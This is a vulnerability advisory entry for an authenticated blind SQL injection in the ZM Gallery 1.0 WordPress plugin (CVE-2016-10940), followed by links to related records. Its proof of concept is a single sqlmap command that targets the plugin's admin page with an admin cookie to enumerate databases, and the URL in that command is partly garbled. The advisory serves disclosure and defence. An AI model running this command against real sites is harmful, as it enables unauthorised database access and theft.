Lucene search
Lenon LeiteWPVDB-ID:C0CBD314-0F4F-47DB-911D-9B2E974BD0F6HistoryDec 14, 2016 - 12:00 a.m.
ZM Gallery 1.0 – Authenticated Blind SQL Injection
2016-12-1400:00:00
Lenon Leite
wpscan.com
7
EPSS
0.007
Percentile
80.4%
The plugin is still affected and has been closed. Type user access: admin user. $_GET[‘order’] is escaped wrong. Attack with Blind Injection
PoC
python sqlmap.py -u “http://www.example.com/wp-admin/admin.php?page=zm_gallery&orderby;=nameℴ=desc” --dbs --cookie=“cookie of admin user” --level=5 --dbms=mysql
Related
nuclei
nuclei
WordPress zm-gallery plugin 1.0 SQL Injection
2022-02-02 15:27:47
wpexploit
wpexploit
ZM Gallery 1.0 – Authenticated Blind SQL Injection
2016-12-14 00:00:00
cvelist
cvelist
CVE-2016-10940
2019-09-13 11:49:11
prion
prion
Sql injection
2019-09-13 12:15:00
nvd
nvd
CVE-2016-10940
2019-09-13 12:15:10
cve
cve
CVE-2016-10940
2019-09-13 12:15:10